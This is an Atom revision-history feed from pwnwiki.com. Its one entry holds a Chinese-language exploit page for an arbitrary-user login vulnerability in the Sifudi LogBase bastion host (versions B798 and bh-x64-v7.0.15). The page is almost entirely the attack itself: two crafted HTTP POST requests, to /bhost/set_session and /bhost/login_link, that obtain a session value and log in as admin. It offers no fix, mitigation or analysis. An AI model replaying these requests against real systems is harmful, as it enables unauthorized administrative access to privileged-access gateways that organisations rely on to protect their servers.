<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E6%80%9D%E7%A6%8F%E8%BF%AA%E5%A0%A1%E5%A3%98%E6%A9%9F%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6%E7%99%BB%E9%8C%84%E6%BC%8F%E6%B4%9E</id>
	<title>思福迪堡壘機任意用戶登錄漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E6%80%9D%E7%A6%8F%E8%BF%AA%E5%A0%A1%E5%A3%98%E6%A9%9F%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6%E7%99%BB%E9%8C%84%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E6%80%9D%E7%A6%8F%E8%BF%AA%E5%A0%A1%E5%A3%98%E6%A9%9F%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6%E7%99%BB%E9%8C%84%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T19:11:34Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=%E6%80%9D%E7%A6%8F%E8%BF%AA%E5%A0%A1%E5%A3%98%E6%A9%9F%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6%E7%99%BB%E9%8C%84%E6%BC%8F%E6%B4%9E&amp;diff=1684&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==影響範圍== LogBase-B798  bh-x64-v7.0.15  ==漏洞利用==  獲取INFO字段，u1參數值爲用戶名 &lt;code&gt;POST /bhost/set_session HTTP/1.1Host:xx.xx.xx.xxu1=admin&amp;m1=&lt;...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E6%80%9D%E7%A6%8F%E8%BF%AA%E5%A0%A1%E5%A3%98%E6%A9%9F%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6%E7%99%BB%E9%8C%84%E6%BC%8F%E6%B4%9E&amp;diff=1684&amp;oldid=prev"/>
		<updated>2021-04-15T09:16:16Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==影響範圍== LogBase-B798  bh-x64-v7.0.15  ==漏洞利用==  獲取INFO字段，u1參數值爲用戶名 &amp;lt;code&amp;gt;POST /bhost/set_session HTTP/1.1Host:xx.xx.xx.xxu1=admin&amp;amp;m1=&amp;lt;...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==影響範圍==&lt;br /&gt;
LogBase-B798&lt;br /&gt;
&lt;br /&gt;
bh-x64-v7.0.15&lt;br /&gt;
&lt;br /&gt;
==漏洞利用==&lt;br /&gt;
&lt;br /&gt;
獲取INFO字段，u1參數值爲用戶名 &amp;lt;code&amp;gt;POST /bhost/set_session HTTP/1.1Host:xx.xx.xx.xxu1=admin&amp;amp;m1=&amp;lt;/code&amp;gt;獲得:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;{&amp;quot;result&amp;quot;:true,&amp;quot;info&amp;quot;:&amp;quot;1562205376847&amp;quot;,&amp;quot;ErrMsg&amp;quot;:&amp;quot;&amp;quot;}&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
代入INFO字段進入如下請求a0參數值中&lt;br /&gt;
&lt;br /&gt;
uCode參數值爲用戶名&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
POST /bhost/login_link HTTP/1.1Host: xx.xx.xx.xxa0=1562205376847&amp;amp;a1=&amp;amp;a10=2019-01-01+10:10:10&amp;amp;ha=CADFDF26E649FB6284D2FD424BD294B6&amp;amp;uCode=admin&amp;amp;vdcode=&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
利用後可成功登錄後臺&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>